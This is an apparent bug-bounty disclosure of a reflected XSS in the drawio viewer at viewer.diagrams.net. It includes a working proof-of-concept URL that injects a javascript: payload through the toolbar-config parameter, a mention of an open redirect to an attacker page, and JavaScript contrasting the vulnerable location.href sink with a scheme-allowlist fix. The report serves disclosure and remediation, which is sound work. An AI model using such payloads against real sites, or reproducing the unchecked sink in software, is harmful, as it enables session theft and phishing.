XSS at https://viewer.diagrams.net/ in jgraph/drawio

Valid

Reported on

Sep 5th 2022


Description

The viewer reads the toolbar-config query parameter, a JSON object whose backBtn.url and refreshBtn.url fields specify the URL that the back and refresh toolbar buttons navigate to. The value is assigned to location.href without validating its scheme, so an attacker who supplies a javascript: URL gets it executed in the viewer.diagrams.net origin as soon as the victim clicks either button.

Proof of Concept

Go to:

https://viewer.diagrams.net/index.html?tags=%7B%7D&highlight=0000ff&&layers=1&nav=1&toolbar=1&toolbar-config=%7B%22backBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D,%22refreshBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D%7D&title=xss.drawio#RdZNdb9sgFIZ%2FjaXtopUDTdZdxkmbatI2TVnVa2qoTQscD%2BPa6a%2FfIYA%2F1lWyZHjOy%2FnikNGdHg6WNfV34EJlJOdDRvcZIasrQjL%2F5fwUCF1HUFnJo2gCR%2FkmIswj7SQX7ULoAJSTzRKWYIwo3YIxa6Ffyp5ALaM2rBLvwLFk6j19kNzVgV6TLxO%2FE7KqU%2BTV5muwaJbEsZK2Zhz6GaI3Gd1ZABdWetgJ5ZuX%2BhLO3X5gHROzwrj%2FHLhvhf35%2BOx7QnLFHvFezqKMbBTqiycw3tK6Uyx186eDZLhozxexRcE6b%2FAyi8mOq8r%2Ff4vBJWcYNfgLppCakuYlxHxmr6wtrWzQuF1sfLr%2BW%2BcMW27dJw5lp7GiSw6aSfM5uEpFr39ct923fP9r%2F3ab3w2H432nL1ZjM8cmTVUR59OkRe20b8AKl62z8CJ2oMAiMWCEr1oq9Q9iSlYGtyWmI5AXr5igxNHYRoOWnPswRV9LJ44NK33MHh8CMgud4cLnnY8d8Q7E8OH9zQs5CNDC2RNK4gFK4yDFl0Q2cd9Pc5lQPRvJdIzFl1CNnqdhwUXsXdrOxiehaVTP8tmDpzd%2FAQ%3D%3D

Click the refresh or the back icon on the toolbar. Each button navigates to the javascript: URL taken from toolbar-config, and alert(document.domain) fires in the viewer.diagrams.net origin.
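The sink described above, as an added example that is not drawio's own code: a URL pulled out of the toolbar-config parameter flows into location.href, first unchecked (the vulnerable pattern) and then through a scheme allowlist that refuses the javascript: payload. The base URL and the decoded toolbar-config value are taken from the PoC link; the browser's location object is stood in by a plain object so the code runs in Node.

```javascript
// Added example, not drawio's code: the sink described in the report
// (a URL taken from the toolbar-config query parameter and assigned to
// location.href) next to a scheme-allowlisting check that rejects the
// javascript: payload. The viewer URL and the decoded toolbar-config
// value are constructed here from the PoC link above.

const VIEWER_BASE = "https://viewer.diagrams.net/index.html";

// Decoded toolbar-config JSON from the PoC, re-encoded as a query string.
const POC_QUERY = "toolbar=1&toolbar-config=" + encodeURIComponent(
  '{"backBtn":{"url":"javascript:alert(document.domain)"},' +
  '"refreshBtn":{"url":"javascript:alert(document.domain)"}}'
);

// Pull the JSON object out of the query string; null if absent or malformed.
function parseToolbarConfig(search) {
  const raw = new URLSearchParams(search).get("toolbar-config");
  if (raw === null) return null;
  try {
    return JSON.parse(raw);
  } catch (e) {
    return null;
  }
}

// Vulnerable pattern: the attacker-controlled string goes straight into
// location.href. In a browser a javascript: URL assigned here runs in the
// page's origin; the plain object used as a stand-in only records it.
function vulnerableNavigate(loc, url) {
  loc.href = url;
  return loc.href;
}

// Hardened: resolve the value against the current page and allow only
// http(s). new URL() lowercases the scheme and strips tabs, newlines and
// leading whitespace, so "java\nscript:" and " JavaScript:" are caught too.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

function safeNavigationUrl(raw, base, { sameOrigin = false } = {}) {
  if (typeof raw !== "string") return null;
  let parsed;
  try {
    parsed = new URL(raw, base);
  } catch (e) {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return null;
  // Optional: also block protocol-relative and cross-origin targets, which
  // closes the redirect-to-phishing-page use of the same parameter.
  if (sameOrigin && parsed.origin !== new URL(base).origin) return null;
  return parsed.href;
}

function hardenedNavigate(loc, raw, opts) {
  const target = safeNavigationUrl(raw, loc.href, opts);
  if (target === null) return false; // refuse and stay on the current page
  loc.href = target;
  return true;
}

// Run the PoC value through both sinks and report what each did.
function demo() {
  const cfg = parseToolbarConfig(POC_QUERY);
  const payload = cfg.backBtn.url;

  const vulnLoc = { href: VIEWER_BASE + "?" + POC_QUERY };
  const vulnerableTarget = vulnerableNavigate(vulnLoc, payload);

  const safeLoc = { href: VIEWER_BASE + "?" + POC_QUERY };
  const hardenedNavigated = hardenedNavigate(safeLoc, payload);

  return { payload, vulnerableTarget, hardenedNavigated, hardenedHref: safeLoc.href };
}

console.log(demo());
```

The scheme allowlist alone still lets a protocol-relative value such as //evil.example/ through as https://evil.example/, which is the phishing angle listed under Impact; pass sameOrigin: true if the buttons are only ever meant to point back into the viewer.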

Impact

Reflected XSS in the viewer.diagrams.net origin: the javascript: URL runs when the victim clicks the back or refresh toolbar button of a link the attacker crafted. Because the same parameter accepts any URL, it can also send the victim to an attacker-controlled page for phishing.

We are processing your report and will contact the jgraph/drawio team within 24 hours. 25 days ago
David Benson validated this vulnerability 25 days ago
Joao Vitor Maia has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson confirmed that a fix has been merged on b5dfeb 24 days ago
The fix bounty has been dropped
EditorUi.js#L2555 has been validated
EditorUi.js#L2819 has been validated